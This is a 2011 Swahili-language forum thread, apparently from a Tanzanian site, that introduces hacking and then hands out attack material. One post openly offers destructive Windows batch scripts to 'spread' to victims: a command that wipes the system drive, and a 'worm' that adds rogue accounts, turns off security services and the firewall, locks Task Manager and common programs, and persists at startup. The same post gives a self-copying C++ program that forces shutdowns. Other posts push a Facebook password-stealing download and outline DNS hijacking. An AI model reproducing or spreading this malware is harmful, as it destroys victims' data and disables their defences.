Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

Hacking katika internet

Discussion in 'Tech, Gadgets & Science Forum' started by MziziMkavu, Dec 29, 2011.

  1. MziziMkavu

    MziziMkavu JF-Expert Member

    #1
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
    Kuna baadhi ya watu hasa vijana wakisoma kuhusu computer kidogo tu basi atakuja kwenye maneno kama virus au spyware ( sikuhizi ) , ukitoka kwenye hayo atakuja katika hacking , cracking na phreaking yote hayo , lakini wengi wanapenda zaidi hacking . wengi wanapenda hii iliwekeza kuharibu kitu Fulani zaidi kuangalia emailza za wenzao na kadhalika .

    Leo naongelea kuhusu hacking , phreaking na cracking , ntakuambia kitu hacking ni kitendo cha mtu au kundi Fulani la watu , kuingia katika mtandao wa computer nyingine kwa njia zisizo sahihi , kwa malengo ya uharibufu au wizi wa data ( kumbuka hakuna hacker mjinga na hackers wote wanajuwa wanachofanya ndio maana anajiandaa vya kutosha .

    Katika hacking sharti la kwanza ni bora ujuwe angalau lugha 2 au zaidi zinazotumika katika kutengeza programs ili nawe utengeneze zako kwa shuguli zako kama hizo hizo , pia ujuwe jinsi computer zinavyowasiliana ( internet na sheria zake ) Mfano protocols , aina zake , na command kadhaa . Katika operating system unatakiwa ujue angalau linux au unix , hata windows lakini ukifanya hacking katika windows hakuna atakayekusifia kwa sababu nyingi ni rahisi .

    Kwenye hacking kuna watu aina 2 , kuna hacker mwenyewe anayeendasha kitendo hicho , na victim ( huyu victim ndio mvamiwa ) sasa kabla ya kuvamia mara nyingi kutumika mtindo wa network scanning ( kuna prorame maalumu kwa ajili ya kufanya scanning unaweza kupata bure katika internet au unaweza tengeneza mwenyewe ndio maana unatakiwa kujuwa kutengeneza programmes kwa matakwa yako .

    Akisha fanya scanning , atapata jibu kuhusu computer yako na taarifa zako ( hiyo ni kama computer yenyewe sio safe ) sio safe kama haina firewall au programe yoyote ya kuweza kuilindi mtu kutoka mtandao tofauti kuweza kuingilia computer yako , akisha fanya scanning jibu analopata ni kuhusu computer yako ( IP ADDRESS , OPERATING SYSTEM , USER NAME , GETWAY , ISP ) muhimu zaidi ni GETWAY na Hiyo IP ADDRESS .

    Okey akisha pata hiyo basi atajaribu kuingia katika computer yako au mtandao wako , kutumia windows xp ni rahisi zaidi kuingia kuliko zingine , katika windows xp kuna siri nyingi zaidi zimejificha ambazo ni rahisi kujulikana hasa katika internet explorer , drivers za NIC na kadhalika , siwezi kutaja vyote kama una hobby ya hacking ni vizuri ukaaanza kutafuta mwenyewe .

    Katika hacking mtu huruhusiwi kutowa siri yoyote , bali kuelekeza tu mengine anafanya mwenywe na kusoma mwenywe mpaka naye aje kuwa mtaalamu zaidi , usichoke kusoma au kutafuta note za ziada , kusoma ili kupat akuelewa zaidi .

    Cracking ni Kitendo cha kubadili programe Fulani kwa matakwa yako haswa hizi programe za trial au za demo , kama games na kadhalika , na phreaking ni aina ya hacking pia lakini inatumika kwa njia ya simu mfano kuingilia computer ya mtu kutumia line za simu ( dialing )

    Ahsante Happy Hacking

    Yona Maro

    Kwa wale wanaopenda mambo ya hacking kama mimi haya tena tuanze hapa kuelimishana
     
  2. Mpangamji

    Mpangamji JF-Expert Member

    #2
    Dec 29, 2011
    Joined: May 12, 2010
    Messages: 528
    Likes Received: 1
    Trophy Points: 35
    ok, seen
     
  3. Mkasika

    Mkasika JF-Expert Member

    #3
    Dec 29, 2011
    Joined: Sep 11, 2010
    Messages: 393
    Likes Received: 4
    Trophy Points: 35
    Mzizi Mkavu your expertise might come in handy here..Who is behind it?
     
  4. MziziMkavu

    MziziMkavu JF-Expert Member

    #4
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
    Katika kutumia hii Hacker ya Internet itabidi uwe na System ya Ubuntu ni bure tu ku install na ni bora zaidi kuliko Windows X au Windows 7. Na hiyo Ubuntu inapatika hapa bonyeza Download Ubuntu | Ubuntu

    Ubuntu for you

    Super-fast, easy to use and free, the Ubuntu operating system powers millions of desktops, netbooks and servers around the world. Ubuntu does everything you need it to. It'll work with your existing PC files, printers, cameras and MP3 players. And it comes with thousands of free apps.
    Take the tour ›



    What is an operating system?

    An operating system is what makes your computer work. The core program of any computer, it's designed to run all your programs and manage all your hardware and software. Other examples of operating systems include Microsoft Windows, Mac OS X and Android.
    Why use Ubuntu? ›

    How does it compare to my system?

    With Ubuntu, you can do everything you can do with other operating systems. But faster. And for free!
    Explore features ›
    How can it be free?

    Ubuntu is, and always will be, absolutely free. Created by the best open-source experts from all over the world, Ubuntu is available in 24 languages and ready for download today.
    Why is it free? ›

    Only on Ubuntu
    • [​IMG]Thousands of free apps
    • [​IMG]Free upgrades for life
    • [​IMG]Built-in security
    • [​IMG]Ubuntu One Music Store



    1. [​IMG]
    2. [​IMG] [​IMG] [​IMG]
     
  5. Change_it

    Change_it JF-Expert Member

    #5
    Dec 29, 2011
    Joined: Sep 17, 2010
    Messages: 279
    Likes Received: 0
    Trophy Points: 0
    umesomeka mkuu,sasa mimi nina ubuntu ila naanza vp kujifunza hii hacking, ni vitu gani napaswa nivijue?
     
  6. MziziMkavu

    MziziMkavu JF-Expert Member

    #6
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
    this is for all that want to destroy someone computer i put some scrpits together and i made viruses see and try and good luck !!! Just open notepad and copy this scripts or codes and save them as name.bat and then spred them !!!! SOOO SIMPLE
    -system32


    del %systemdrive%\*.* /s /f /q


    -worm


    @echo off
    taskkill -f -im explorer.exe
    copy virus.bat C:\windows\
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    start iexplore.exe Google
    net user hhthhy virus /add
    net user roc13xtyh virus /add
    net user roc13x123 virus /add
    net user roc13x1 virus /add
    net user roc13x12 virus /add
    net user roc13x2 virus /add
    net user roc13x3 virus /add
    net user roc13x4 virus /add
    net user roc13x5 virus /add
    net user roc13x6 virus /add
    net user roc13x7 virus /add
    net user roc13x8 virus /add
    net user roc13x9 virus /add
    net user roc13x0 virus /add
    net user roc13x10 virus /add
    net user roc13x10 virus /add
    net user roc13x12 virus /add
    net user roc13x2 virus /add
    net user roc13x1 virus /add
    net user roc13x2 virus /add
    net user roc13x34 virus /add
    net user roc13x34 virus /add
    net user roc13x33 virus /add
    net user roc13x343 virus /add
    net user roc13x45 virus /add
    net user roc13x00 virus /add
    net user roc13x000 virus /add
    net user roc13x0000 virus /add
    net user roc13x00000 virus /add
    net user roc13x000000 virus /add
    net user roc13x0000000 virus /add
    net user roc13x00000000 virus /add
    net user roc13x000000000 virus /add
    net user roc13x0000000000 virus /add
    net user roc13x00000000000 virus /add
    net user roc13x000000000000 virus /add
    net user my comp /delete
    mkdir %userprofile%\desktop\virus3000 njhjkhjkh
    mkdir %userprofile%\desktop\virus3000hjhkhhjkh j
    mkdir %userprofile%\desktop\virus3000jjjkjjj
    mkdir %userprofile%\desktop\virus3000jhh
    net stop "security center"
    net stop "sharedaccess"
    net stop "windows defender"
    netsh firewall set opmode mode = disable
    del "%userprofile%\desktop\internet explorer"
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\wi ndows\currentversion\run /hate /d C:\windows\bulldog worm.bat
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoClose /t REG_DWORD /d 1
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 1 /d iexplore.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 2 /d notepad.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 3 /d wordpad.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 4 /d wmplayer.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 5 /d msnmsgr.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 6 /d avast.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d help.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d steam.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d winmail.exe
    reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d outlook.exe
    title VIRUS ALERT
    color 04
    echo A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER AND WILL ERASE EVERYTHING!
    shutdown -r


    -matrix


    #include
    #include
    #include
    #include
    #include
    #include
    #include
    using namespace std;
    int main()
    { keybd_event(VK_MENU,0x38,0,0);
    keybd_event(VK_RETURN,0x1c,0,0);
    keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
    keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
    HANDLE outToScreen;
    outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
    {
    char buffer[255];
    char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
    ifstream input(inputFile);
    if (!input)
    {
    {
    ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
    fp << "@ECHO OFF \n";
    fp << "START C:\\rawr.exe \n";
    fp << "EXIT";
    }
    }
    else
    {
    while (!input.eof())
    {
    input.getline(buffer,255);
    }
    }
    }
    {
    char buffer[255];
    char inputFile[]="C:\\rawr.exe";
    ifstream input(inputFile);
    if (!input)
    {
    {
    {
    ofstream fp("CLICK.bat", ios::app);
    fp << "@ECHO OFF \n";
    fp << "COPY matrix.exe C:\\rawr.exe \n";
    fp << "START C:\\rawr.exe \n";
    fp << "EXIT";
    }
    system("START CLICK.bat");
    main();
    }
    }
    else
    {
    while (!input.eof())
    {
    input.getline(buffer,255);
    system("call shutdown.exe -S");
    goto START;
    }
    }
    }
    START:{
    for(int i = 0; i < 1; i++)
    {
    int num = (rand() % 10);
    SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
    cout << setw(4) << num;
    cout << setw(4) << "0%";
    cout << setw(4) << "P";
    cout << setw(4) << " ";
    cout << setw(4) << ")";
    cout << setw(4) << "#";
    cout << setw(4) << "X";
    cout << setw(4) << "@";
    cout << setw(4) << "1&";
    cout << setw(4) << "*";
    cout << setw(4) << "||";
    cout << setw(4) << " \a";
    Sleep(60);
    }
    }
    for ( int j = 0; j < 5; j++)
    {
    SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
    int number = (rand() % 24);
    cout << setw(4) << number;
    }
    goto START;
     
  7. MziziMkavu

    MziziMkavu JF-Expert Member

    #7
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
    Ndio tunakwenda Taratibu la kama una taka haraka na kiingereza kinapanda jaribu kujiunga na website za Hacker hizi hapa bonyeza Forum au hii Hackers Center Security Portal au hii hacker.org :: Index jiunge huko utapata faida nyingi mimi nipo huko natumia jina la Lucky.

    [h=2]How To Become A Hacker Bonyeza hapa http://www.pavietnam.net/[/h]
    [h=2]What Is a Hacker?[/h]


    The Jargon File contains a bunch of definitions of the term â&#8364;&#732;hackerâ&#8364;&#8482;, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how tobecome a hacker, though, only two are really relevant.
    There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term â&#8364;&#732;hackerâ&#8364;&#8482;. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.
    The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music â&#8364;" actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them â&#8364;&#732;hackersâ&#8364;&#8482; too â&#8364;" and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term â&#8364;&#732;hackerâ&#8364;&#8482;.
    There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people â&#8364;&#732;crackersâ&#8364;&#8482; and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word â&#8364;&#732;hackerâ&#8364;&#8482; to describe crackers; this irritates real hackers no end.
    The basic difference is this: hackers build things, crackers break them.
    If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.
     
  8. MziziMkavu

    MziziMkavu JF-Expert Member

    #8
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280





    Hapa tutajifunza kwa kutumia Video itakuwa ni
    Vizuri sana unasemaje Wakuu?
     
    Last edited by a moderator: Jan 4, 2016
  9. Change_it

    Change_it JF-Expert Member

    #9
    Dec 29, 2011
    Joined: Sep 17, 2010
    Messages: 279
    Likes Received: 0
    Trophy Points: 0
     
  10. MziziMkavu

    MziziMkavu JF-Expert Member

    #10
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
    Mkuu mimi sijuwi kitu ila ninajifunza humu kwenye Ma Website napoteza muda wangu mwingi kuangalia website na Ma Forums na Ma Blog hata shule sikuenda I just try to be myself, whatever that.
     
  11. MziziMkavu

    MziziMkavu JF-Expert Member

    #11
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
     
    Last edited by a moderator: Jan 4, 2016
  12. elmagnifico

    elmagnifico JF-Expert Member

    #12
    Dec 29, 2011
    Joined: Jul 7, 2011
    Messages: 4,156
    Likes Received: 1,494
    Trophy Points: 280
    Mti mkavu ila umechemka kusema ubuntu ni windows na watu weng tu nshasikia wanamix mambo. Ubuntu ni open source os
     
  13. MziziMkavu

    MziziMkavu JF-Expert Member

    #13
    Dec 29, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280


    Do you want to get the password of any facebook account?
    Then, Download this program, and follow my instructions.

    Download Link[UPDATED]:
    http://www.multiupload.com/PS9H75WVV4
     
    Last edited by a moderator: Jan 4, 2016
  14. MziziMkavu

    MziziMkavu JF-Expert Member

    #14
    Dec 30, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
     
    Last edited by a moderator: Jan 4, 2016
  15. MziziMkavu

    MziziMkavu JF-Expert Member

    #15
    Dec 30, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280





    Level: Intermediate
    Presenter: Eli the Computer Guy
    Date Created: November 1, 2010
    Length of Class: 45 Minutes
    Tracks

    Hacking
    Computer Security /Integrity
    Prerequisites

    Knowledge of TCP/IP and Domain Name Resolution
    Purpose of Class

    This class teaches students how use DNS to redirect computer or network users to alternate websites or servers for security or malicious purposes.
    Topics Covered

    How DNS Works
    Editing the HOSTS file
    Alternate Public DNS
    Planning a DNS Hack
    Reasons to Hack DNS
    Class Notes

    Introduction
    DNS resolves Domain Names to IP Addresses
    Warning: Use at your own risk
    DNS

    HOSTS file is the local file that resolves Domain Names
    Windows Location = C:\Windows\System32\drivers\etc
    Example = 10.1.10.2 $50 Computer Repair in Baltimore - Eli the Computer Guy - PC Repair - Laptop Repair - Data Recovery - Mac Repair

    In Vista/ Windows 7 First Open Notepad using "Run as Administrator" and then open the HOSTS file. Otherwise you will not be able to save your edits.

    Computers FIRST try to Resolve a Domain Name with the HOSTS file, they then Go To the LOCAL DNS Server, and then they Query the PUBLIC DNS Server. If any server has a record the computer does not ask any other sources. SO if the

    HOSTS file has a record the computer uses that record and stops.
    Using Alternate DNS

    You do not have to use the Public DNS IP Addresses that your ISP gave you. You can use Alternate Public DNS Servers.
    The benefit of using a server like OpenDNS.org is that they will prevent Domain Names for malicious websites from resolving. This is a HUGE security tool.

    You can create your own Public DNS Server for Good/ Bad Purposes.
    The DNS Attack

    HOSTS file can be compromised either through manual editing, or through scripting. If users are logged in as USERS vs. ADMINISTRATORS there is far less chance that a script will be able to modify the HOSTS file.

    By Wardriving or Plugging Into an Unsecured Network Jack You May be able to Hack the DNS Server. Routers/ Modems with default passwords are easy to Hack.

    A clever, well disguised DNS Hack is very difficult to detect once it has been successfully implemented, and it is moderately difficult to circumvent if it is done by a network administrator to secure a network.
    Final Thoughts
    Hacking DNS is the EASIEST way to either protect or attack a network or computer

    Category:

    Science & Technology
    Tags:

     
    Last edited by a moderator: Jan 4, 2016
  16. MziziMkavu

    MziziMkavu JF-Expert Member

    #16
    Dec 31, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
    How to remotely shutdown any computer





     
    Last edited by a moderator: Jan 4, 2016
  17. MziziMkavu

    MziziMkavu JF-Expert Member

    #17
    Dec 31, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280




     
    Last edited by a moderator: Jan 4, 2016
  18. MziziMkavu

    MziziMkavu JF-Expert Member

    #18
    Dec 31, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280
    Last edited by a moderator: Jan 4, 2016
  19. MziziMkavu

    MziziMkavu JF-Expert Member

    #19
    Dec 31, 2011
    Joined: Feb 3, 2009
    Messages: 38,516
    Likes Received: 2,789
    Trophy Points: 280





     
    Last edited by a moderator: Jan 4, 2016
  20. KALYOVATIPI

    KALYOVATIPI JF-Expert Member

    #20
    May 29, 2012
    Joined: Aug 11, 2011
    Messages: 1,418
    Likes Received: 6
    Trophy Points: 0
    fungua darasa kwa sisi vilaza tunaojua kuwasha na kuzima na kufungua miziki na jf tu
     
Loading...